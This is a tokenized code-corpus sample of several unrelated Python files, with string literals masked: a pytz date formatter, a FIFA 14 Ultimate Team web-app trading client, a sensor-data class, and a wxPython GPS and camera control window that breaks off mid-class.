<s> from datetime import datetime , timedelta , tzinfo <EOL> import locale <EOL> import sys <EOL> import time <EOL> import pytz <EOL> from pytz . exceptions import UnknownTimeZoneError <EOL> ST2 = sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> <EOL> locale . setlocale ( locale . LC_TIME , '<STR_LIT>' ) <EOL> if not ST2 : <EOL> basestring = str <EOL> class LocalTimezone ( tzinfo ) : <EOL> """<STR_LIT>""" <EOL> STDOFFSET = timedelta ( seconds = - time . timezone ) <EOL> if time . daylight : <EOL> DSTOFFSET = timedelta ( seconds = - time . altzone ) <EOL> else : <EOL> DSTOFFSET = STDOFFSET <EOL> DSTDIFF = DSTOFFSET - STDOFFSET <EOL> def utcoffset ( self , dt ) : <EOL> if self . _isdst ( dt ) : <EOL> return self . DSTOFFSET <EOL> else : <EOL> return self . STDOFFSET <EOL> def dst ( self , dt ) : <EOL> if self . _isdst ( dt ) : <EOL> return self . DSTDIFF <EOL> else : <EOL> return timedelta ( <NUM_LIT:0> ) <EOL> def tzname ( self , dt ) : <EOL> return None <EOL> def _isdst ( self , dt ) : <EOL> tt = ( dt . year , dt . month , dt . day , <EOL> dt . hour , dt . minute , dt . second , <EOL> dt . weekday ( ) , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> stamp = time . mktime ( tt ) <EOL> tt = time . localtime ( stamp ) <EOL> return tt . tm_isdst > <NUM_LIT:0> <EOL> class FormatDate ( object ) : <EOL> """<STR_LIT>""" <EOL> local_tz = LocalTimezone ( ) <EOL> default = dict ( <EOL> format = "<STR_LIT>" , <EOL> tz_in = "<STR_LIT>" <EOL> ) <EOL> def __init__ ( self , local_tz = None , default = None ) : <EOL> if local_tz : <EOL> if isinstance ( local_tz , tzinfo ) : <EOL> self . local_tz = local_tz <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> if default is not None : <EOL> self . set_default ( default ) <EOL> def set_default ( self , update ) : <EOL> for k , v in update . items ( ) : <EOL> if k in self . default : <EOL> self . 
default [ k ] = v <EOL> def parse ( self , format = None , tz_in = None , tz_out = None ) : <EOL> if format == "<STR_LIT>" : <EOL> return str ( time . time ( ) ) . split ( '<STR_LIT:.>' ) [ <NUM_LIT:0> ] <EOL> dt = self . date_gen ( tz_in , tz_out ) <EOL> text = self . date_format ( dt , format ) <EOL> if ST2 and isinstance ( text , str ) : <EOL> try : <EOL> text = text . decode ( locale . getpreferredencoding ( ) ) <EOL> except UnicodeDecodeError : <EOL> text = text . decode ( '<STR_LIT:utf-8>' ) <EOL> return text <EOL> def check_tzparam ( self , tz , name ) : <EOL> if isinstance ( tz , basestring ) : <EOL> try : <EOL> tz = str ( tz ) <EOL> return pytz . timezone ( tz ) <EOL> except UnknownTimeZoneError : <EOL> raise UnknownTimeZoneError ( "<STR_LIT>" <EOL> % ( name , tz ) ) <EOL> if tz is not None and not isinstance ( tz , tzinfo ) : <EOL> raise TypeError ( "<STR_LIT>" <EOL> % ( name , tz ) ) <EOL> return tz <EOL> def date_gen ( self , tz_in = None , tz_out = None ) : <EOL> """<STR_LIT>""" <EOL> if tz_in is None : <EOL> tz_in = self . default [ '<STR_LIT>' ] <EOL> if tz_in == "<STR_LIT>" : <EOL> tz_in = self . local_tz <EOL> tz_in = self . check_tzparam ( tz_in , '<STR_LIT>' ) <EOL> tz_out = self . check_tzparam ( tz_out , '<STR_LIT>' ) <EOL> try : <EOL> dt = tz_in . localize ( datetime . now ( ) ) <EOL> except AttributeError : <EOL> dt = datetime . now ( tz = tz_in ) <EOL> if not tz_out : <EOL> return dt <EOL> dt = dt . astimezone ( tz_out ) <EOL> try : <EOL> return tz_out . normalize ( dt ) <EOL> except AttributeError : <EOL> return dt <EOL> def date_format ( self , dt , format = None ) : <EOL> """<STR_LIT>""" <EOL> if format is None : <EOL> format = self . default [ '<STR_LIT>' ] <EOL> if format . startswith ( "<STR_LIT>" ) : <EOL> sep = '<STR_LIT:T>' <EOL> if len ( format ) == <NUM_LIT:5> and format [ <NUM_LIT:3> ] == '<STR_LIT::>' : <EOL> sep = str ( format [ - <NUM_LIT:1> ] ) <EOL> dt = dt . replace ( microsecond = <NUM_LIT:0> ) <EOL> return dt . 
isoformat ( sep ) <EOL> return dt . strftime ( format ) </s>
<s> from Fifa14Client import Card <EOL> import requests <EOL> from Fifa14Client . Exceptions import BadRequestException , FUTErrorCodeException <EOL> class WebAppFunctioner ( object ) : <EOL> """<STR_LIT>""" <EOL> COIN_URL = '<STR_LIT>' <EOL> TRANSFER_URL = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' <EOL> BID_URL = '<STR_LIT>' <EOL> MOVE_URL = '<STR_LIT>' <EOL> UNASSIGNED_URL = '<STR_LIT>' <EOL> LIST_CARD_URL = '<STR_LIT>' <EOL> TRADEPILE_URL = '<STR_LIT>' <EOL> QUICKSELL_URL = '<STR_LIT>' <EOL> WATCHLIST_URL = '<STR_LIT>' <EOL> WATCHLIST_REMOVE_URL = '<STR_LIT>' <EOL> TRADEPILE_REMOVE_URL = '<STR_LIT>' <EOL> SQUAD_URL = '<STR_LIT>' <EOL> CLUB_URL = '<STR_LIT>' <EOL> ACCOUNT_URL = '<STR_LIT>' <EOL> LEADER_URL = '<STR_LIT>' <EOL> def __init__ ( self , login_manager ) : <EOL> self . login_manager = login_manager <EOL> if self . login_manager . ini_platform in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . platform_string = '<STR_LIT>' <EOL> else : <EOL> self . platform_string = '<STR_LIT>' <EOL> def get_headers ( self , http_method ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT>' : self . login_manager . fut_web_phishing , <EOL> '<STR_LIT>' : self . login_manager . x_ut_sid , <EOL> '<STR_LIT>' : http_method } <EOL> def get_coin_amount ( self ) : <EOL> """<STR_LIT>""" <EOL> r = requests . post ( self . COIN_URL % self . platform_string , headers = self . get_headers ( '<STR_LIT:GET>' ) ) <EOL> try : <EOL> json = r . 
json ( ) <EOL> except ValueError : <EOL> raise BadRequestException ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in json : <EOL> return json [ '<STR_LIT>' ] <EOL> elif '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( '<STR_LIT>' , json ) <EOL> else : <EOL> raise BadRequestException ( '<STR_LIT>' ) <EOL> def search ( self , type = "<STR_LIT>" , lev = "<STR_LIT>" , pos = "<STR_LIT>" , num = <NUM_LIT:10> , team = "<STR_LIT>" , <EOL> macr = "<STR_LIT>" , micr = "<STR_LIT>" , minb = "<STR_LIT>" , nat = "<STR_LIT>" , maxb = "<STR_LIT>" , <EOL> playStyle = "<STR_LIT>" , leag = "<STR_LIT>" , start = <NUM_LIT:0> , cat = "<STR_LIT>" , <EOL> definitionId = "<STR_LIT>" , maskedDefId = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> the_url = self . TRANSFER_URL % ( self . platform_string , type , lev , pos , num , team , macr , micr , minb , nat , maxb , <EOL> playStyle , leag , start , cat , definitionId , maskedDefId ) <EOL> r = requests . post ( the_url , headers = self . get_headers ( '<STR_LIT:GET>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' in json : <EOL> card_list = json [ '<STR_LIT>' ] <EOL> return [ Card . Card ( card_dict ) for card_dict in card_list ] <EOL> elif '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> def bid ( self , card , price ) : <EOL> """<STR_LIT>""" <EOL> payload = '<STR_LIT>' % ( price ) <EOL> the_url = self . BID_URL % ( self . platform_string , card . tradeId ) <EOL> r = requests . post ( the_url , headers = self . get_headers ( '<STR_LIT>' ) , data = payload ) <EOL> try : <EOL> json = r . json ( ) <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) <EOL> if '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> def move ( self , card , pile ) : <EOL> """<STR_LIT>""" <EOL> payload = '<STR_LIT>' % ( card . id , pile ) <EOL> r = requests . post ( self . MOVE_URL % self . 
platform_string , headers = self . get_headers ( '<STR_LIT>' ) , data = payload ) <EOL> try : <EOL> json = r . json ( ) <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" % pile ) <EOL> if '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( "<STR_LIT>" % pile , json ) <EOL> def get_unassigned_pile ( self ) : <EOL> """<STR_LIT>""" <EOL> r = requests . post ( self . UNASSIGNED_URL % self . platform_string , headers = self . get_headers ( '<STR_LIT:GET>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' in json : <EOL> card_list = json [ '<STR_LIT>' ] <EOL> return [ Card . Card ( card_dict ) for card_dict in card_list ] <EOL> elif '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> def list_card ( self , card , starting_bid , buy_now_price = <NUM_LIT:0> , duration = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> payload = '<STR_LIT>' % ( buy_now_price , card . id , duration , starting_bid ) <EOL> r = requests . post ( self . LIST_CARD_URL % self . platform_string , headers = self . get_headers ( '<STR_LIT:POST>' ) , data = payload ) <EOL> try : <EOL> json = r . json ( ) <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) <EOL> if '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> else : <EOL> return json [ '<STR_LIT:id>' ] <EOL> def get_tradepile ( self ) : <EOL> """<STR_LIT>""" <EOL> r = requests . post ( self . TRADEPILE_URL % self . platform_string , headers = self . get_headers ( '<STR_LIT:GET>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' in json : <EOL> card_list = json [ '<STR_LIT>' ] <EOL> return [ Card . 
Card ( card_dict ) for card_dict in card_list ] <EOL> elif '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> def quicksell ( self , card ) : <EOL> """<STR_LIT>""" <EOL> the_url = self . QUICKSELL_URL % ( self . platform_string , card . id ) <EOL> r = requests . post ( the_url , headers = self . get_headers ( '<STR_LIT>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) <EOL> if '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> def get_watchlist ( self ) : <EOL> """<STR_LIT>""" <EOL> r = requests . post ( self . WATCHLIST_URL % self . platform_string , headers = self . get_headers ( '<STR_LIT:GET>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) <EOL> if '<STR_LIT>' in json : <EOL> card_list = json [ '<STR_LIT>' ] <EOL> return [ Card . Card ( card_dict ) for card_dict in card_list ] <EOL> elif '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> def remove_card_from_watchlist ( self , card ) : <EOL> """<STR_LIT>""" <EOL> the_url = self . WATCHLIST_REMOVE_URL % ( self . platform_string , card . tradeId ) <EOL> r = requests . post ( the_url , headers = self . get_headers ( '<STR_LIT>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> except : <EOL> pass <EOL> def remove_from_tradepile ( self , card ) : <EOL> """<STR_LIT>""" <EOL> the_url = self . TRADEPILE_REMOVE_URL % ( self . platform_string , card . tradeId ) <EOL> r = requests . post ( the_url , headers = self . get_headers ( '<STR_LIT>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> except : <EOL> pass <EOL> def get_squad ( self , squad_num ) : <EOL> """<STR_LIT>""" <EOL> the_url = self . SQUAD_URL % ( self . platform_string , squad_num ) <EOL> r = requests . 
post ( the_url , headers = self . get_headers ( '<STR_LIT:GET>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> if '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> else : <EOL> return json <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) <EOL> def get_club ( self , count = "<STR_LIT>" , level = "<STR_LIT>" , type = "<STR_LIT>" , start = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> the_url = self . CLUB_URL % ( self . platform_string , count , level , type , start ) <EOL> r = requests . post ( the_url , headers = self . get_headers ( '<STR_LIT:GET>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> if '<STR_LIT:code>' in json : <EOL> raise FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> else : <EOL> return [ Card . Card ( card ) for card in json [ '<STR_LIT>' ] ] <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) <EOL> def get_user_id ( self ) : <EOL> '''<STR_LIT>''' <EOL> the_url = self . ACCOUNT_URL % self . platform_string <EOL> r = requests . post ( the_url , headers = self . get_headers ( '<STR_LIT:GET>' ) ) <EOL> try : <EOL> json = r . json ( ) <EOL> if '<STR_LIT:code>' in json : <EOL> print FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> else : <EOL> return json [ '<STR_LIT>' ] <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) <EOL> def get_leaderboard_stats ( self , stat ) : <EOL> """<STR_LIT>""" <EOL> userId = self . get_user_id ( ) <EOL> the_url = self . LEADER_URL % ( self . platform_string , userId ) <EOL> print the_url <EOL> r = requests . post ( the_url , headers = self . get_headers ( '<STR_LIT:GET>' ) ) <EOL> sIndex = { '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:2> , <EOL> '<STR_LIT>' : <NUM_LIT:3> } <EOL> try : <EOL> json = r . 
json ( ) <EOL> if '<STR_LIT:code>' in json : <EOL> print FUTErrorCodeException ( "<STR_LIT>" , json ) <EOL> else : <EOL> return json [ '<STR_LIT>' ] [ sIndex [ stat ] ] [ '<STR_LIT>' ] [ '<STR_LIT:value>' ] <EOL> except : <EOL> raise BadRequestException ( "<STR_LIT>" ) </s>
<s> class POCVModelData : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . has_GPS = False <EOL> self . fix = <NUM_LIT:0> <EOL> self . lat = <NUM_LIT:0.0> <EOL> self . lon = <NUM_LIT:0.0> <EOL> self . gps_heading = <NUM_LIT:0.0> <EOL> self . speed = <NUM_LIT:0.0> <EOL> self . altitude = <NUM_LIT:0.0> <EOL> self . num_sat = <NUM_LIT:0> <EOL> self . has_time = False <EOL> self . timestamp = '<STR_LIT>' <EOL> self . datestamp = '<STR_LIT>' <EOL> self . has_compass = False <EOL> self . compass_heading = <NUM_LIT:0.0> <EOL> self . compass_pitch = <NUM_LIT:0.0> <EOL> self . compass_roll = <NUM_LIT:0.0> <EOL> self . has_magnetometer = False <EOL> self . magnet_x = <NUM_LIT:0.0> <EOL> self . magnet_y = <NUM_LIT:0.0> <EOL> self . magnet_z = <NUM_LIT:0.0> <EOL> self . has_gyro = False <EOL> self . has_accelerometer = False <EOL> self . accelerometer_x = <NUM_LIT:0.0> <EOL> self . accelerometer_y = <NUM_LIT:0.0> <EOL> self . accelerometer_z = <NUM_LIT:0.0> <EOL> self . has_temperature = False <EOL> self . temperature = <NUM_LIT:0.0> </s>
<s> import logging <EOL> import socket <EOL> import datetime <EOL> import wx <EOL> from camera_view import CameraPanel <EOL> class MainWindow ( wx . Frame ) : <EOL> def __init__ ( self , parent , title , controller , server_name , rpc_port , camera_port ) : <EOL> self . controller = controller <EOL> self . _server_name = server_name <EOL> self . _rpc_port = rpc_port <EOL> self . _camera_port = camera_port <EOL> wx . Frame . __init__ ( self , parent , title = title , size = ( <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . panel = wx . Panel ( self ) <EOL> self . sizer = wx . BoxSizer ( wx . VERTICAL ) <EOL> self . sizer_view = wx . BoxSizer ( wx . HORIZONTAL ) <EOL> self . sizer_control = wx . BoxSizer ( wx . HORIZONTAL ) <EOL> self . sizer . Add ( self . sizer_view , <NUM_LIT:1> , wx . EXPAND | wx . LEFT | wx . RIGHT | wx . TOP , <NUM_LIT:4> ) <EOL> self . sizer . Add ( self . sizer_control , <NUM_LIT:1> , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . map_frame = MapPanel ( self . panel , controller ) <EOL> self . sizer_view . Add ( self . map_frame , <NUM_LIT:3> , wx . EXPAND | wx . RIGHT , <NUM_LIT:4> ) <EOL> cam_enabled = self . controller . model . capture_img_enabled <EOL> self . camera_frame = CameraPanel ( self . panel , server_name , camera_port , cam_enabled ) <EOL> self . sizer_view . Add ( self . camera_frame , <NUM_LIT:1> , wx . EXPAND ) <EOL> self . camera_update_count = <NUM_LIT:0> <EOL> self . waypoint_frame = WayPointPanel ( self . panel ) <EOL> self . sizer_control . Add ( self . waypoint_frame , <NUM_LIT:1> , wx . EXPAND | wx . RIGHT , <NUM_LIT:4> ) <EOL> self . display_frame = DisplayPanel ( self . panel , controller ) <EOL> self . sizer_control . Add ( self . display_frame , <NUM_LIT:1> , wx . EXPAND | wx . RIGHT , <NUM_LIT:4> ) <EOL> self . autopilot_frame = AutoPilotPanel ( self . panel , controller ) <EOL> self . sizer_control . Add ( self . autopilot_frame , <NUM_LIT:1> , wx . EXPAND | wx . RIGHT , <NUM_LIT:4> ) <EOL> self . 
manualpilot_frame = ManualPilotPanel ( self . panel , controller ) <EOL> self . sizer_control . Add ( self . manualpilot_frame , <NUM_LIT:1> , wx . EXPAND ) <EOL> self . CreateStatusBar ( ) <EOL> self . panel . SetSizerAndFit ( self . sizer ) <EOL> self . Bind ( wx . EVT_CLOSE , self . OnClose ) <EOL> interval_time = <NUM_LIT> <EOL> self . timer = wx . Timer ( self ) <EOL> self . Bind ( wx . EVT_TIMER , self . on_timer , self . timer ) <EOL> self . timer . Start ( interval_time , False ) <EOL> def on_timer ( self , event ) : <EOL> self . update ( ) <EOL> def OnClose ( self , event ) : <EOL> logging . debug ( "<STR_LIT>" ) <EOL> if self . controller : <EOL> self . controller . close_connection ( ) <EOL> def update ( self ) : <EOL> """<STR_LIT>""" <EOL> logging . debug ( "<STR_LIT>" ) <EOL> self . controller . update ( ) <EOL> self . display_frame . update ( ) <EOL> if self . camera_update_count > <NUM_LIT:200> : <EOL> self . camera_frame . update ( ) <EOL> self . camera_update_count = <NUM_LIT:0> <EOL> else : <EOL> self . camera_update_count += <NUM_LIT:1> <EOL> @ property <EOL> def server ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _server <EOL> @ property <EOL> def rpc_port ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _rpc_port <EOL> @ property <EOL> def camera_port ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _camera_port <EOL> class MapPanel ( wx . Panel ) : <EOL> def __init__ ( self , parent , view_controller ) : <EOL> wx . Panel . __init__ ( self , parent , style = wx . SUNKEN_BORDER ) <EOL> self . _view_controller = view_controller <EOL> class WayPointPanel ( wx . Panel ) : <EOL> def __init__ ( self , parent ) : <EOL> wx . Panel . __init__ ( self , parent , style = wx . SUNKEN_BORDER ) <EOL> self . sizer = wx . GridBagSizer ( vgap = <NUM_LIT:2> , hgap = <NUM_LIT:2> ) <EOL> self . header = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . 
header , ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . sizer . Add ( wx . StaticLine ( self ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . SetSizerAndFit ( self . sizer ) <EOL> class DisplayPanel ( wx . Panel ) : <EOL> def __init__ ( self , parent , controller ) : <EOL> wx . Panel . __init__ ( self , parent , style = wx . SUNKEN_BORDER ) <EOL> self . controller = controller <EOL> self . sizer = wx . GridBagSizer ( vgap = <NUM_LIT:2> , hgap = <NUM_LIT:2> ) <EOL> self . header = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . header , ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . sizer . Add ( wx . StaticLine ( self ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . l1 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l1 , ( <NUM_LIT:2> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . l2 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l2 , ( <NUM_LIT:3> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . t2 = wx . TextCtrl ( self , value = "<STR_LIT>" , style = wx . TE_READONLY ) <EOL> self . sizer . Add ( self . t2 , ( <NUM_LIT:3> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . l3 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l3 , ( <NUM_LIT:4> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . t3 = wx . TextCtrl ( self , value = "<STR_LIT>" , style = wx . TE_READONLY ) <EOL> self . sizer . 
Add ( self . t3 , ( <NUM_LIT:4> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . l4 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l4 , ( <NUM_LIT:5> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . t4 = wx . TextCtrl ( self , value = "<STR_LIT>" , style = wx . TE_READONLY ) <EOL> self . sizer . Add ( self . t4 , ( <NUM_LIT:5> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . l5 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l5 , ( <NUM_LIT:6> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . t5 = wx . TextCtrl ( self , value = "<STR_LIT>" , style = wx . TE_READONLY ) <EOL> self . sizer . Add ( self . t5 , ( <NUM_LIT:6> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . l6 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l6 , ( <NUM_LIT:7> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . t6 = wx . TextCtrl ( self , value = "<STR_LIT>" , style = wx . TE_READONLY ) <EOL> self . sizer . Add ( self . t6 , ( <NUM_LIT:7> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . l7 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l7 , ( <NUM_LIT:8> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . t7 = wx . TextCtrl ( self , value = "<STR_LIT>" , style = wx . TE_READONLY ) <EOL> self . sizer . Add ( self . t7 , ( <NUM_LIT:8> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . 
RIGHT , <NUM_LIT:2> ) <EOL> self . cb_fix = wx . CheckBox ( self , label = "<STR_LIT>" ) <EOL> self . cb_fix . SetValue ( False ) <EOL> self . sizer . Add ( self . cb_fix , ( <NUM_LIT:9> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . l8 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l8 , ( <NUM_LIT:10> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . t8 = wx . TextCtrl ( self , value = "<STR_LIT>" , style = wx . TE_READONLY ) <EOL> self . sizer . Add ( self . t8 , ( <NUM_LIT:10> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . sizer . Add ( wx . StaticLine ( self ) , ( <NUM_LIT:11> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . l9 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l9 , ( <NUM_LIT:12> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . ALL , <NUM_LIT:4> ) <EOL> self . l10 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l10 , ( <NUM_LIT> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . t10 = wx . TextCtrl ( self , value = "<STR_LIT>" , style = wx . TE_READONLY ) <EOL> self . sizer . Add ( self . t10 , ( <NUM_LIT> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . l11 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l11 , ( <NUM_LIT> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . t11 = wx . TextCtrl ( self , value = "<STR_LIT>" , style = wx . TE_READONLY ) <EOL> self . sizer . Add ( self . 
t11 , ( <NUM_LIT> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . l12 = wx . StaticText ( self , label = "<STR_LIT>" ) <EOL> self . sizer . Add ( self . l12 , ( <NUM_LIT:15> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . t12 = wx . TextCtrl ( self , value = "<STR_LIT>" , style = wx . TE_READONLY ) <EOL> self . sizer . Add ( self . t12 , ( <NUM_LIT:15> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , wx . EXPAND | wx . LEFT | wx . RIGHT , <NUM_LIT:2> ) <EOL> self . sizer . AddGrowableCol ( <NUM_LIT:0> ) <EOL> self . SetSizerAndFit ( self . sizer ) <EOL> def update ( self ) : <EOL> self . t2 . SetValue ( str ( self . controller . model . GPS_latitude ) ) <EOL> self . t3 . SetValue ( str ( self . controller . model . GPS_longitude ) ) <EOL> self . t5 . SetValue ( str ( self . controller . model . GPS_heading ) ) <EOL> self . t6 . SetValue ( str ( self . controller . model . GPS_speed ) ) <EOL> self . t7 . SetValue ( str ( self . controller . model . GPS_altitude ) ) <EOL> self . cb_fix . SetValue ( self . controller . model . GPS_fix ) <EOL> self . t8 . SetValue ( str ( self . controller . model . GPS_satellite_count ) ) <EOL> self . t4 . SetValue ( str ( self . controller . model . compass_heading ) ) <EOL> self . t10 . SetValue ( str ( self . controller . model . time ) ) <EOL> self . t11 . SetValue ( str ( self . controller . model . date ) ) <EOL> self . t12 . SetValue ( str ( self . controller . model . temperature ) ) <EOL> class AutoPilotPanel ( wx . Panel ) : <EOL> def __init__ ( self , parent , controller ) : <EOL> wx . Panel . __init__ ( self , parent , style = wx . SUNKEN_BORDER ) <EOL> self . controller = controller <EOL> self . sizer = wx . GridBagSizer ( vgap = <NUM_LIT:4> , hgap = <NUM_LIT:4> ) <EOL> self . 